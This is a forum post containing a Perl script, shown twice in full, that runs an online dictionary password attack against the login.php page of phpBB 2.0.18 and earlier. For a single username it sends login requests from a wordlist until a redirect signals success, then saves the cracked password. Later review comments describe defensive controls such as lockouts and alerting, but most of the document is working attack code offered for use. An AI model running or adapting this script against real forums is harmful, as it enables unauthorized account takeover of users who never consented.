D1mOn
26.01.2006, 16:55
#!/usr/bin/perl
############################################
# Credits: Weakness and Xploit by DarkFig
# Affected products: All PhpBB versions <= 2.0.18
# Type: Dictionary attack (online password guessing against login.php)
# Solutions: None official , but many solutions are possible ;)
# Note: If a line of the dictionary file contains no data => "End of the password file"
# Ps: Public after 1week lol
#Demo: http://rapidshare.de/files/9574771/phpbb_dict_login.rar.html
# Team: Hackademie [] Acid_Root [] BoD []
# PS: Volcom, happy birthday, ok fine I'm late... here's your present ^^
############################################
#
# Summary: a flat script that takes six command-line arguments, loads a
# wordlist into memory and submits one login POST per word for a single
# username, stopping at the first reply whose status line contains 302.
#
# NOTE(review), defender view: nothing in this listing handles a lockout,
# a delay or a CAPTCHA; guesses are sent back to back. Presumably the
# affected versions place no limit on failed logins -- confirm against the
# vendor changelog. The matching controls are a failed-login limit per
# account and per source address, a growing delay or challenge after
# repeated failures, and alerting on bursts of failed logins for one user.
#
# NOTE(review): no `use strict` / `use warnings`; every variable below is a
# package global.
use IO::Socket;
#--------------Usage--------------#
# Exactly six arguments are required; otherwise print the usage banner and exit.
if(@ARGV != 6){
print "
+---------------------------------------------------------------------------------+
+------------PhpBB <= 2.0.18 Passwd Dictionnary Attack [] by DarkFig--------------+
+---------------------------------------------------------------------------------+
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile> +
+---------------------------------------------------------------------------------+
+ <host> => The host where PhpBB is installed | [Ex: site.com] +
+ <path> => Path of the PhpBB board | [Ex: /forum/] +
+ <port> => PhpBB board port | [Default is 80] +
+ <pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +
+ <username> => Username you want to bruteforce | [Ex: MasterLamer] +
+ <file_result> => File you want to log activity | [Ex: results.txt] +
+---------------------------------------------------------------------------------+
";exit();}
#--------------Data--------------#
# Positional arguments are copied into globals without any validation.
$host = $ARGV[0];
$path = $ARGV[1];
# $full (host + path) is only used in the result file written on success.
$full = "$host"."$path";
$port = $ARGV[2];
$pass_file = $ARGV[3];
$username = $ARGV[4];
$fileresult = $ARGV[5];
# $OK is the loop flag: 0 while searching, set to 1 on a 302 reply.
$OK = 0;
# $referer is built here but never referenced again in this listing, so no
# Referer header is sent.
$referer = "http://"."$host"."$path"."login.php?redirect=";
# Request target of every POST: <path>login.php
$postit = "$path"."login.php";
#--------------Hello world-----------------#
# Start-up banner echoing the username, wordlist and result-file names.
print "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Attack log | $fileresult
+---------------------------------------------------------+";
#--------------Password file--------------#
# Read the whole wordlist into @passdico, one entry per line, newline removed.
# NOTE(review): 2-arg open with a bareword handle on a command-line value;
# `||` binds to the string operand, so the die() is not tied to open's result.
open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n");
chomp(@passdico = <FILE>);
# $nligne is the index of the current wordlist entry (also reported as the
# number of tests in the result file).
$nligne = "0";
# Main loop: one wordlist entry per iteration. Every way out of the loop is an
# explicit exit() (empty entry, or 302 reply).
while ($OK ne 1) {
$passwordz = "$passdico[$nligne]";
# Form body; username and password are concatenated as-is (no URL-encoding),
# and the body always ends with "&redirect=&login=Connexion".
$request = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
# Value later sent as Content-Length.
$length = length $request;
# An empty entry (blank line, or index past the end of the list) ends the run
# with a "no result" message.
if ($passwordz eq ""){print "\n [-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();}
#--------------Sending data--------------#
# Traffic shape visible in this listing (useful when reading server logs):
#  - a new TCP connection per guess, closed right after the reply prefix is read;
#  - POST <path>login.php carrying only Host, Content-Type and Content-Length
#    (no User-Agent, no Cookie, no Referer);
#  - header lines end in a bare "\n" rather than CRLF;
#  - no pause between attempts, all of them for the same username.
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed...";
print $send "POST $postit HTTP/1.1\n";
print $send "Host: $host\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: $length\n\n";
print $send "$request\n";
# Only the first 15 bytes of the reply are read; the rest is discarded.
read $send, $answer, 15;
close($send);
#-------------Success---------------#
# A 302 in the status line is treated as a successful login.
# NOTE(review): presumably the board redirects after a valid login and answers
# differently after a failed one -- the script depends on that difference.
if ($answer =~ /HTTP\/(.*?) 302/) {
$OK = 1;
print "
[-] Trying the password "."$passwordz
[+] User: $username
[+] Password: $passwordz
+---------------------------------------------------------+\n";
# The result file is overwritten and holds the recovered password in clear
# text; the open is not checked.
open results, ">$fileresult";
print results "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
[+] PhpBB board | $full
[+] Board's port | $port
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Number of test | $nligne
[+] Password found | $passwordz
+---------------------------------------------------------+\n";
close(FILE);close(results);exit();}
#-------------Failed-----------------#
# Any non-302 reply: log the entry just tried and move to the next one.
if ($OK == 0) {print "\n [-] Trying the password "."$passwordz";$nligne++;}}
############################################
# NOTE(review): from here on the post repeats the same listing a second time
# (header, `use` line and body), without the shebang line.
# Credits: Weakness and Xploit by DarkFig
# Affected products: All PhpBB versions <= 2.0.18
# Type: Dictionary attack (online password guessing against login.php)
# Solutions: None official , but many solutions are possible ;)
# Note: If a line of the dictionary file contains no data => "End of the password file"
# Ps: Public after 1week lol
#Demo: http://rapidshare.de/files/9574771/phpbb_dict_login.rar.html
# Team: Hackademie [] Acid_Root [] BoD []
# PS: Volcom, happy birthday, ok fine I'm late... here's your present ^^
############################################
#
# Summary: takes six command-line arguments, loads a wordlist and submits one
# login POST per entry for a single username until a reply's status line
# contains 302.
#
# NOTE(review), defender view: the loop below has no pause and no handling of
# lockouts. The matching controls are a failed-login limit per account and per
# source address, a delay or challenge after repeated failures, and alerting on
# bursts of failed logins for one user.
use IO::Socket;
#--------------Usage--------------#
# Exactly six arguments are required; otherwise print the usage banner and exit.
if(@ARGV != 6){
print "
+---------------------------------------------------------------------------------+
+------------PhpBB <= 2.0.18 Passwd Dictionnary Attack [] by DarkFig--------------+
+---------------------------------------------------------------------------------+
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile> +
+---------------------------------------------------------------------------------+
+ <host> => The host where PhpBB is installed | [Ex: site.com] +
+ <path> => Path of the PhpBB board | [Ex: /forum/] +
+ <port> => PhpBB board port | [Default is 80] +
+ <pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +
+ <username> => Username you want to bruteforce | [Ex: MasterLamer] +
+ <file_result> => File you want to log activity | [Ex: results.txt] +
+---------------------------------------------------------------------------------+
";exit();}
#--------------Data--------------#
# Positional arguments copied into package globals, unvalidated.
$host = $ARGV[0];
$path = $ARGV[1];
$full = "$host"."$path";
$port = $ARGV[2];
$pass_file = $ARGV[3];
$username = $ARGV[4];
$fileresult = $ARGV[5];
# Loop flag: 0 while searching, 1 once a 302 reply is seen.
$OK = 0;
# Built but never referenced again in this listing (no Referer header is sent).
$referer = "http://"."$host"."$path"."login.php?redirect=";
# Request target of every POST.
$postit = "$path"."login.php";
#--------------Hello world-----------------#
print "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Attack log | $fileresult
+---------------------------------------------------------+";
#--------------Password file--------------#
# Whole wordlist is read into @passdico with newlines stripped.
# NOTE(review): 2-arg open, bareword handle; the `||` applies to the string
# operand rather than to open's return value.
open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n");
chomp(@passdico = <FILE>);
# Index of the current wordlist entry.
$nligne = "0";
# One entry per iteration; the loop is only ever left through exit().
while ($OK ne 1) {
$passwordz = "$passdico[$nligne]";
# Form body, values inserted without URL-encoding.
$request = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
$length = length $request;
# Empty entry (blank line or end of list) ends the run.
if ($passwordz eq ""){print "\n [-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();}
#--------------Sending data--------------#
# Log-visible traits: a fresh TCP connection per guess; only Host, Content-Type
# and Content-Length headers; bare "\n" line endings; no delay between requests.
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed...";
print $send "POST $postit HTTP/1.1\n";
print $send "Host: $host\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: $length\n\n";
print $send "$request\n";
# Only the first 15 bytes of the reply are inspected.
read $send, $answer, 15;
close($send);
#-------------Success---------------#
# A 302 status is taken to mean the login was accepted.
if ($answer =~ /HTTP\/(.*?) 302/) {
$OK = 1;
print "
[-] Trying the password "."$passwordz
[+] User: $username
[+] Password: $passwordz
+---------------------------------------------------------+\n";
# Result file is overwritten and stores the password in clear text; the open
# is not checked.
open results, ">$fileresult";
print results "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
[+] PhpBB board | $full
[+] Board's port | $port
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Number of test | $nligne
[+] Password found | $passwordz
+---------------------------------------------------------+\n";
close(FILE);close(results);exit();}
#-------------Failed-----------------#
# Non-302 reply: print the entry just tried and advance the index.
if ($OK == 0) {print "\n [-] Trying the password "."$passwordz";$nligne++;}}